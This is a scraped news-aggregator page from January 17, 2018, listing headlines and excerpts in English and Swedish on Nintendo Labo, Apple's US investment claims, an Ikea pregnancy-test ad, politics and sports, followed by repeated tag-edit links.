The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort.
.com { color: #32CD32; font-weight: bold; }

23:32
Nintendo just unveiled Labo, a $69 cardboard controller for the Switch you have to build yourself
» ‎ Tech

Tags: [edit]
- Nintendo announced "Labo" on Wednesday evening with a video.
- The product is an addition to the Nintendo Switch, the popular game console from Nintendo.
- Using cardboard constructions, Switch owners will create new ways of controlling their console.
Nintendo unveiled a new product on Wednesday evening, named "Labo."

The bizarre-looking new idea uses cardboard to craft new ways of controlling games on Nintendo's popular Switch console.

The device starts at $69.99, and is scheduled to launch on April 20.

There are two different versions of Labo, as seen here:

The idea with Labo is you can buy one of several sets, which come with instructions for how to construct your controller.

Nintendo's pitching the idea as a combination of "the magic of Nintendo Switch with the fun of DIY creations," and is using "Make / Play / Discover" as the slogan for Labo.

Here's how it works: After you get home with Labo, you'll pull out instructions, and a bunch of cardboard, and construct whichever kit you've purchased.

Once constructed, you can insert your Nintendo Switch into the corresponding locations and play one of several games shown.

That's right: More than just cardboard construction sets, Labo comes with software to play along with your new creation.

Some of the examples given are a fishing game (where you build your own fishing pole), a piano (where you build your own mini piano), and a racing game (where you build your own handlebars).

The games look simple and intuitive, like "Wii Sports."

One game even uses an almost virtual reality-like setup to enact massive robot battles:

Nintendo Labo will be available on April 20 starting at $69.99. You can read more about it from Nintendo on Labo's official website.

A video debuted alongside the announcement, which you can see here:

Join the conversation about this story »

NOW WATCH: 7 science-backed ways for a happier and healthier 2018 — this is what you do the very first week

23:31
Nomad’s new wireless charging hub is a traveler’s best friend
» ‎ TechCrunch

Tags: [edit]

If you spend any meaningful amount of time in hotels, you’ll know that many of them are still living in the age of the 30-pin adapter, even though most of us have already moved on to Lightning, wireless charging and USB-C. Nomad’s new wireless USB hub really cuts down on clutter, and makes it easy to charge what you need to charge, when you need to charge it. Read More

23:31
Study Absolves Rats Of Blame For Europe's Black Death
» ‎ WN.com - Photown News

Tags: [edit]

Rats get a bad rap for spreading the bubonic plague, or Black Death, that killed millions of people in medieval Europe, but it turns out the rodents may not be to blame after all, CBS News reports. Instead, the disease may have spread from person to person through human-feeding parasites, including fleas and lice, a new study conducted by researchers from Norway’s University of Oslo and Italy’s University of Ferrara suggests. The findings challenge "the assumption that plague in Europe was predominantly spread by rats," the researchers wrote in their study, published online Tuesday in the journal Proceedings of the National Academy of Sciences. Plague is caused by a bacterium called...

23:30
Heated Intraperitoneal Chemo for Ovarian Cancer Ups Survival
» ‎ Medscape Medical News Headlines

Tags: [edit]

A single administration of hyperthermic intraperitoneal chemotherapy at the end of cytoreductive surgery improves overall survival in women with advanced ovarian cancer.
Medscape Medical News

23:29
Trump: US embassy WON'T move to Jerusalem in the next year
» ‎ Home | Mail Online

Tags: [edit]

The president denied the planned relocation of the U.S. embassy in Israel to Jerusalem would take place within a year; he announced the move in December but didn't provide a timeframe.
23:29
Bullies beat up a boy before sharing the video on Snapchat
» ‎ Home | Mail Online

Tags: [edit]

Sean Wilbraham was riding his brand new bike near his home in Donnington, Shropshire, when at least five boys chased him through the streets before launching a savage assault.

23:29
Startups Race to Create Cancer Screens from DNA
» ‎ WIRED

Tags: [edit]

Entrepreneurs are selling VCs a vision of cheap, surgery-free cancer screening based on blood tests, even before symptoms appear.

23:28
The pee-soaked Ikea pregnancy ad is actually more than just a gimmick
» ‎ The Verge - All Posts

Tags: [edit]

Early last year, an ad agency approached Jonas Hansson, product manager for Mercene Labs in Stockholm, to see if he could create a quite unorthodox advertisement for Ikea: a magazine ad that asked pregnant women to pee on the page to reveal a discount for a crib.

“At first, I didn’t believe it was serious,” Hansson says. But the agency, Åkestam Holst, was serious, so Hansson got to work.

The ad debuted last week in the Swedish magazine Amelia, and prompted a flurry of media coverage. The ad uses technology similar to that of over-the-counter pregnancy tests. But it’s also more than that, and it could potentially lead to better tools for diagnosing certain types of heart disease.
“At first, I didn’t believe it was serious.”
It works like this: when a pregnant woman pees on the ad, the urine dissolves a red ink made of gold nanoparticles. That’s because those nanoparticles are infused with antibodies that attach themselves to a particular hormone found in the pee of pregnant women, called hCG. Thanks to special paper soaked in another hCG-binding antibody, the red ink sticks to the magazine page, revealing the discounted price within a couple of minutes. No, expectant mothers don’t have to bring the urine-soaked ad to the Ikea store. The ad is just a reminder that the $124 crib is on sale for $61 with the Ikea Family discount.

“This ad isn’t any ‘grosser’ than taking an ordinary pregnancy test, really,” Åkestam Holst art directors Evelina Rönnung and Hugo Wallmo say in an email to The Verge.

In at-home pregnancy tests, a strip also changes color if the woman is pregnant and her pee contains hCG. But the magazine ad had to be 100 times bigger than those pregnancy tests, so the technology needed to be tweaked. “When we tested materials similar to the ones in normal pregnancy tests, the wait until the text appears was almost an hour, and still very difficult to read,” Hansson says.

So Hansson started testing different kinds of materials developed by Mercene Labs, whose products are used in anything from floors to microchips. Eventually, he and his team combined several materials in different layers: one is a paper-like layer with large pores, so that the urine could be moved around the page quickly. That layer also contains the antibodies that interact with the hCG hormone and allow for the discounted price to appear next to the crib. The paper-like sheet was then sandwiched between two layers of a thin and flexible substance that could keep the urine from spreading everywhere and the magazine page from falling apart. This sandwich basically allowed the ad to feel like a glossy magazine page, instead of being hard like a piece of plastic, Hansson says.
“This ad isn’t any ‘grosser’ than taking an ordinary pregnancy test.”
Hansson is now working on developing a type of synthetic paper that could combine all of those characteristics, and be used to develop diagnostic tools to detect certain types of heart diseases. Heart attacks, for instance, are very hard to diagnose from symptoms alone, like chest pain. But if, say, paramedics in an ambulance had a tool that can pick up certain biomarkers from plasma, just like the ad picks up the pregnancy hormone from the urine, they could quickly determine whether someone is having a heart attack. That would allow patients to receive immediate treatment, which is key to survive a heart attack. “One of the goals with this kind of technology is to do something simple like the pregnancy stick but for diseases that are very hard to diagnose otherwise, because you need higher precision,” Hansson says.

Such tools are still a long way away, and the new synthetic material would need to undergo a long series of testing and clinical trials before it’s used to diagnose diseases. But Hansson is excited by the prospect. And it all started with a weird ad Hansson believed was a joke.

“I thought it was a weird request, but I also thought it was really funny,” he says. “I was not sure that Ikea would approve it, but they did.”

23:27
Contributing Op-Ed Writer: Aziz, We Tried to Warn You
» ‎ NYT > Home Page

Tags: [edit]

It may seem like rules around sex have changed overnight, but feminists have been talking about this for a long time.

23:27
Contributing Op-Ed Writer: Aziz, We Tried to Warn You
» ‎ NYT > Home Page

Tags: [edit]

It may seem like rules around sex have changed overnight, but feminists have been talking about this for a long time.

23:27
008: Apple’s first comedy, HomePods shipping, BMW’s CarPlay mistake | 9to5Mac Daily
» ‎ 9to5Mac

Enclosure: [download]

Tags: [edit]

Today we’ve got Apple’s big investment in the US economy, Kristen Wiig starring in Apple’s first comedy series, Siri learning a new trick, the first 1 million HomePods shipping ahead of launch, and BMW’s consumer hostile CarPlay decision.

9to5Mac Daily is available on iTunes and Apple’s Podcasts app, Stitcher, TuneIn, Google Play, or through our dedicated RSS feed for Overcast and other podcast players.

document.createElement('audio'); [https:]]

more…

23:26
No, Apple Is Not Creating 20,000 Jobs Because of the Tax Bill
» ‎ Stories from Slate

Tags: [edit]

On Wednesday afternoon, Apple posted a press release. The primary purpose of this statement, it seems, was to tell investors exactly how much money the company would have to pay in taxes on the profits it’s now repatriating from overseas, thanks to the Republican tax reform bill, while also announcing that it plans to build a new campus for tech support workers. But instead of simply reporting this information, Tim Cook’s media team decided to drop it in the middle of a long missive titled “Apple Accelerates U.S. Investment and Job Creation.” The iPhone maker promised to “contribute” $350 billion to the U.S. economy over the next five years while hiring 20,000 additional workers.

This has, of course, been catnip for conservative fans of the GOP bill. Fox Business predictably tweeted that Apple would create 20,000 jobs “due to tax reform.”

“This is huge folks. This is another big company. One of the biggest companies in America. Saying big time jobs, a lot of jobs coming back to America,” Fox Business anchor Charles Payne told his viewers, deploying some remarkably Trumpian syntax. “And they say it’s all because of tax reform.” CNBC also reported that Apple was increasing its U.S. investment “in part because of the new tax law,” which gave Nevada Senator Dean Heller an opportunity to gloat.

The punchline here is that Apple did not actually say that it is investing any additional money in the U.S. because of the tax law. That idea appears nowhere in the press release.

Here’s what’s actually going on. As part of its transition to a new system of International taxation, the Republican tax bill included a big, one-timed levy on all the profits U.S. corporations have been hoarding abroad for years. (This is known as a deemed repatriation.) Apple has been sitting on a giant overseas money hoard worth $252 billion. Today, we learned it would pay $38 billion to the IRS as the cost of bringing that cash home.

And what else did we learn? Not a ton. The press release predicts that between its “current pace of spending with domestic suppliers and manufacturers—an estimated $55 billion for 2018—Apple’s direct contribution to the US economy will be more than $350 billion over the next five years.” In other words, Apple will keep buying stuff from other U.S. companies. This is not a patriotic act of charity. Apple is literally saying it will continue business as usual. That alone accounts for $275 billion of its $350 billion forecast.

As for the rest of that total? In a mystifying bit of self-aggrandizement, the company is counting its $38 billion repatriation payment as another “direct contribution” to the U.S. economy. This is money they are required to pay by law. “A payment of that size would likely be the largest of its kind ever made,” the company helpfully notes. This is only true because Apple spent years making money hand-over-fist while doing everything in its power to avoid taxes.

Finally, we get to the company’s actual plans to invest in the U.S. Here, we learn that “Apple expects to invest over $30 billion in capital expenditures in the US over the next five years and create over 20,000 new jobs through hiring at existing campuses and opening a new one,” which will initially “house technical support for customers.”

The 20,000 jobs are nice. (Apple says it currently employs 84,000 U.S.) But there’s no evidence, contra Fox’s talking heads, that they’re coming “back to America” from anywhere. Meanwhile, it’s hard to tell if the $30 billion the company plans to spend would actually be a meaningful increase in its domestic U.S. investment. According to its annual reports, Apple has devoted $56.9 billion to capital expenditures worldwide over the past five years. Presumably, a good chunk of that was spent stateside, building out its retail network and its gleaming new Cupertino campus, for instance. But it’s hard to know how much. “The company has not given guidance in the past regarding where and how capital spending was allocated. This is the first I heard of a specific allocation,” Asymco analyst Horace Dediu told me in an email. So, maybe Apple really is “accelerating” it’s U.S. investment. Maybe it’s not. There’s no actual way to tell based on the information it’s shared publicly.

That brings us to the separate question of whether this spending has anything at all to do with Trump’s tax bill. The answer is almost surely not. Apple has long paid an extremely low tax rate, and it is only really bringing its overseas profits “home” on paper. In reality, the company has always been able to access that money by borrowing against it at dirt cheap rates, which it’s previously done to fund dividends and buybacks for its investors. The specific investments Apple announced today, such as the more than $10 billion it plans to spend on new data centers to support its growing cloud-based businesses like Apple Music, are things it likely would have needed to do not matter what happened in Washington.

“These are probably many capital expenditure initiatives and new site build-outs that Apple was already planning on doing regardless of repatriation,” Michael Olson, an analyst at Piper Jaffray, told Bloomberg.

Apple did not announce a $350 billion investment in the U.S. economy today. It’s not even clear Apple announced it was actually increasing its domestic investment. It certainly did not announce that it was creating jobs because of Trump’s economic magic. The company announced its tax bill and, in the same breath, made some promises about capital expenditures in the states. Then it let the press and conservatives fill in the blank. I guess it’s a clever strategy, if you’re quietly trying to pander to this White House.

23:25
Huge explosion at Manchester factory
» ‎ Home | Mail Online

Tags: [edit]

Firefighters and police have rushed to the scene in Littleborough, near Rochdale, with road closures in place and motorists and pedestrians told the avoid the area.

23:24
Birgitte Bardot sågar metoo: "Tramsigt!"
» ‎ Senaste nyheterna för Alla nyheter på op.se

Tags: [edit]

Den franska skådespelerskan Birgitte Bardot riktar hård kritik mot metoo-rörelsen. I en intervju med det franska magasinet Paris Match säger hon att majoriteten av kvinnorna i uppropet beter sig "hycklande eller tramsigt".

23:23
Your grandparents will love being friends with this robot
» ‎ Mashable

Tags: [edit]

Meet the friendly robot that is designed to converse... with the elderly. Although human company may be nicer, this robot is quite possibly smarter. It can arrange appointments, remind you to Skype your family and take your medicine, and suggest fun activitiesThis robot could be a great friend. Read more...
More about Elderly, Real Time, Real Time Video, Real Time, and Elderly Support

23:23
Trump Shoots Down Netanyahu Remarks On US Embassy Move This Year
» ‎ WN.com - Photown News

Tags: [edit]

In an exclusive interview with Reuters Wednesday, U.S. President Donald Trump shot down the notion the U.S. would move its embassy from Tel Aviv to Jerusalem within a year. In comments made earlier Wednesday during a trip to India, the Israeli prime minister said of the move, “my solid assessment is that it will go much faster than you think – within a year from now,” Press TV reported. “By the end of the year? We’re talking about different scenarios – I mean obviously that would be on a temporary basis. We’re not really looking at that. That’s no.” – US President Donald Trump’s reaction to moving embassy from Tel Aviv to Jerusalem Last month, Trump’s own Secretary of State Rex Tillerson...

23:22
Så ser världens längsta undervattensgrotta ut
» ‎ Nyheterna - tv4.se

Tags: [edit]

Ett forskarteam vid Mexikos östkust har upptäckt ett grottsystem som man tror är världens längsta undervattensgrotta – hela 347 kilometer långt.

23:21
Princess Sofia of Sweden looks elegant at state banquet
» ‎ Home | Mail Online

Tags: [edit]

Princess Sofia, 33, dazzled in a stunning black lace gown as she attended a state banquet at the Stockholm Palace held in honour of Icelandic President Gudni Thorlacius Johannesson.
23:20
Is your other half a master of strategic incompetence?
» ‎ Home | Mail Online

Tags: [edit]

Statistics show women do almost 40 per cent more chores than their male counterparts. Christian Koch revealed he has been able to avoid menial tasks in his home by using ‘strategic incompetence’.

23:19
A Nudge May Be Enough to Change Healthcare Behavior
» ‎ Medscape Medical News Headlines

Tags: [edit]

The nation's first research unit devoted to healthcare nudges has created methods to reduce opioid numbers and encourage use of generics. Experts are finding other uses and unintended consequences.
Medscape Medical News

23:19
Nintendo unveils Labo, DIY cardboard add-ons for the Switch
» ‎ Engadget RSS Feed

Tags: [edit]

If you thought Minecraft was the best thing for kids on the Switch, get ready for Nintendo to (once again) blow your mind. Behold Labo, a set of DIY tools built on cardboard sheets that turns the console into a powerhouse of play. Make a piano, with...
23:19
Google may be bringing its handy Smart Replies to Gboard
» ‎ Engadget RSS Feed

Tags: [edit]

Smart Replies may be cold and impersonal, but they've been handy if you've just wanted to acknowledge a work message or answer a simple question. And soon, you might not even have to open the app. The 9to5Google crew has discovered code references su...

23:18
Tim Cook pops up in Reno to celebrate Apple facility expansion
» ‎ AppleInsider - Frontpage News

Tags: [edit]

Apple chief executive Tim Cook made an appearance in Reno, Nevada on Wednesday as his company broke ground on a new downtown warehouse that will serve Apple's nearby multi-billion data center.

23:18
Ulf Stark kan få postumt HC Andersen-pris
» ‎ Senaste nyheterna för Alla nyheter på op.se

Tags: [edit]

Den svenske författaren Ulf Stark finns med på den korta listan av nominerade till årets HC Andersen-pris, skriver Dagens Nyheter. Det prestigefulla internationella priset delas ut vartannat år av barnboksorganisationen Ibby (International Board on Books for Young People).

23:17
ST:s dom: Adrian Kolgjini stängs av ett halvår
» ‎ Travnet

Tags: [edit]

Det var i december som Adrian Kolgjini lämnade ett positivt drogtest i samband med tävlingar på Jägersro. Nu har Svensk Travsports dom kommit. Kusken stängs av i sex månader.

Vid tävlingarna på Jägersro den 5 december förra året genomfördes ett drogtest. Proffstränaren och kusken Adrian Kolgjini testades då positivt för kokain.

Den 13 december stängdes kusken av tills vidare i väntan på utredning. Under onsdagen kunde Svensk Travsports disciplinnämnd meddela sin dom. Adrian Kolgjini blir avstängd i sex månader. Avstängningen gäller från 13 december till och med den 12 juni.

I ett pressmeddelande skriver Svensk Travsport att man tidigare inte haft något ärende rörande kokain, men att man vid ett tidigare tillfälle i tre månader stängt av en person som testats för cannabis.

– Minimistraffet för ett positivt drogtest är tre månader. Nämnden har tittat på hur straffskalan ser ut i övriga samhället och där ses kokain som ett av de allvarligaste drogbrotten jämfört med till exempel cannabis och valde att gå på en liknande linje. Inom den internationella galoppsporten är sex månaders avstängning praxis vid drogtest positiva för kokain, skriver ST i pressmeddelandet.

Reglementet tillåter inga dispenser för en förseelse som denna. Disciplinnämnden var enig. Adrian Kolgjini kan överklaga beslutet till Svensk Travsports överdomstol. (Foto: ALN).

Läs även: Kolgjini: ”Villig lämna test varje tävlingsdag”

23:17
Apple video content push reportedly helping increase actor's salaries in negotiations with TV networks
» ‎ AppleInsider - Frontpage News

Tags: [edit]

Apple's drive for video content is seemingly having a wider effect on how much actors get paid, with a report claiming Reese Witherspoon and Nicole Kidman bolstered their pay from HBO for a project following after Witherspoon made a similar high-value deal for an Apple-commissioned drama.

23:17
Birgitte Bardot sågar Metoo
» ‎ DN.se - Kultur & Nöje - Senaste nytt - Kultur

Tags: [edit]

Den franska skådespelerskan Brigitte Bardot riktar hård kritik mot Metoo-rörelsen. I en intervju med det franska magasinet Paris Match säger hon att majoriteten av kvinnorna i uppropet beter sig ”hycklande eller tramsigt”.

23:17
Samsung wants you to spend less time on your Galaxy Note 8, says this Thrive app can help
» ‎ PhoneArena - News

Tags: [edit]

Starting with the premise that "your phone is useful, but sometimes you need to put it down," Samsung this week introduced a new free app for its Galaxy Note 8 smartphone. Called Thrive, the app allows you to block all notifications (including calls, texts, and anything that's app-related) for customizable periods of time, whenever you need to just disconnect from your handset. The Thrive app features auto replies, letting those who call or text you know that you're taking a break from your phone. If you want, you can make a VIP list with people who are allowed to reach you at any time. There's ...

23:15
Corbyn defied again as dozens of Labour MPs back SNP move
» ‎ Home | Mail Online

Tags: [edit]

While Corbyn’s frontbench abstained on the amendment, 48 Labour MPs voted for the proposals tabled by the Scottish Nationalist Party. They were joined by one Conservative MP.

23:15
Fan-Made Voldemort Origin Story Brings the Magic
» ‎ Geek.com

Tags: [edit]

More than 20 years after Harry Potter, Ron Weasley, and Hermione Granger entered the pop culture zeitgeist, the magical world of Hogwarts continues to captivate audiences of all ages. Case in point: Fan […]

The post Fan-Made Voldemort Origin Story Brings the Magic appeared first on Geek.com.

23:15
RAF jets to guard Qatar World Cup
» ‎ Home | Mail Online

Tags: [edit]

British airmen operating with Qataris will fly Typhoon fighter jets during the 2022 tournament, said Dr Khalid bin Mohammad Al Attiyah, who is also defence minister.
23:12
Kim Jong-Un's ex-girlfriend helps negotiate Olympic team
» ‎ Home | Mail Online

Tags: [edit]

Hyon Song-wol, leader of the popular Moranbong Band, was photographed alongside head of South Korea's delegation Kwon Hook Bong and the head of the North's team, Lee Woo-sung.

23:11
Zlatans rekord tangerat i PSG:s stora kross
» ‎ Aftonbladet: Sveriges nyhetskälla och mötesplats

Tags: [edit]

23:11
Nintendo’s bringing DIY robots and more to the Switch using cardboard
» ‎ TechCrunch

Tags: [edit]

Nintendo’s big new surprise interactive experience for the Switch is now official, and it’s basically a maker kit for the portable console that uses cardboard component pieces to allow people to build a range of different creations and play with them using the console to power games that interact with the DIY components. Read More

23:11
Nintendo Labo - Hands-on with the Switch's brilliant and barmy cardboard toys
» ‎ The Telegraph - Telegraph online, Daily Telegraph, Sunday Telegraph

Tags: [edit]

23:11
Microsoft puts Minecraft boss in charge of Xbox games
» ‎ The Verge - Tech Posts

Tags: [edit]

Microsoft is promoting its Minecraft boss to the head of the company’s games studios. Matt Booty’s new role sees him oversee Microsoft Studios, second only to Microsoft’s games chief Phil Spencer. Microsoft CEO Satya Nadella previously promoted Phil Spencer from head of Xbox to a new role overseeing all games, associated hardware, and game strategy.

Spencer reports directly to Nadella, with Booty now reporting directly to Spencer. Both changes are designed to improve Microsoft’s games business. Microsoft has struggled to produce first-party games for its Xbox One console over the past year, after canceling Scalebound, Fable Legends, and Ion. Crackdown 3 was delayed until spring, and Microsoft even shut down Project Spark. Microsoft...

Continue reading…

23:11
Microsoft puts Minecraft boss in charge of Xbox games
» ‎ The Verge - All Posts

Tags: [edit]

Microsoft is promoting its Minecraft boss to the head of the company’s games studios. Matt Booty’s new role sees him oversee Microsoft Studios, second only to Microsoft’s games chief Phil Spencer. Microsoft CEO Satya Nadella previously promoted Phil Spencer from head of Xbox to a new role overseeing all games, associated hardware, and game strategy.

Spencer reports directly to Nadella, with Booty now reporting directly to Spencer. Both changes are designed to improve Microsoft’s games business. Microsoft has struggled to produce first-party games for its Xbox One console over the past year, after canceling Scalebound, Fable Legends, and Ion. Crackdown 3 was delayed until spring, and Microsoft even shut down Project Spark. Microsoft launched its Xbox One X game console recently without any high profile exclusive games, and it’s led to questions over the company’s games strategy.

GamesBeat reports that Booty’s new role will see Microsoft devoting more resources to its games business. Booty will be looking after Microsoft’s relationships with 343 Industries, The Coalition, Mojang, Rare, Turn 10 Studios, and Global Publishing. Booty first joined Microsoft back in 2010, and helped launch games for Windows phones. He’s also helped develop Xbox Live Arcade, and oversaw Minecraft maker Mojang after Microsoft acquired the company for $2.5 billion back in 2014.

23:10
Jennifer Aniston & Reese Witherspoon netting huge payouts from Apple for upcoming TV drama
» ‎ 9to5Mac

Tags: [edit]

While we’ve heard quite a bit about the different series Apple has planned for its original content efforts, details on those shows have been sparse. The Hollywood Reporter claims today, however, that Apple is shelling out upward of $1.25 million per episode to both Jennifer Aniston and Reese Witherspoon for their upcoming show…

more…

23:08
En man påkörd av godståg vid järnvägsstationen i Bollnäs
» ‎ Senaste nyheterna för Bollnäs på helahalsingland.se

Tags: [edit]

Sent på onsdagskvällen inträffade en olycka vid järnvägsstationen i Bollnäs. En man som genade över spåret blev påkörd av ett godståg.

23:07
England will give Eddie Jones permission to coach Lions' tour of South Africa after signing new deal
» ‎ The Telegraph - Telegraph online, Daily Telegraph, Sunday Telegraph

Tags: [edit]

23:07
Fyra mål av Neymar – Cavani lika med Zlatan
» ‎ SvD - Sport

Tags: [edit]

Fyra mål av Neymar – Cavani lika med Zlatan

23:07
Eddie Jones tells Manu Tuilagi to sit out Six Nations and concentrate on Leicester
» ‎ The Telegraph - Telegraph online, Daily Telegraph, Sunday Telegraph

Tags: [edit]

23:05
Bil körde i 200 km/h - stoppades av polis
» ‎ Aftonbladet: Sveriges nyhetskälla och mötesplats

Tags: [edit]

23:05
ÖIK ett missat friläge från seger: "Tung förlust när vi är så nära"
» ‎ Senaste nyheterna för Alla nyheter på op.se

Tags: [edit]

Det var en match helt i publikens smak. Ett givande och tagande i närkamper. Snabbt spel och ärlig kamp. Men som vanligt var det Piteå som vann, 3-2. – Vi var ett missat friläge från segern. Jag...

Skip to page: 1 2 3 ... 26

← January 16 (3780 items) January 18 (5091 items) →

Kokthansogreta.nu - Nyhetssök / News Search ! » January 17, 2018

Feeds

(75 unread)

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Enclosure: [download]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]

Tags: [edit]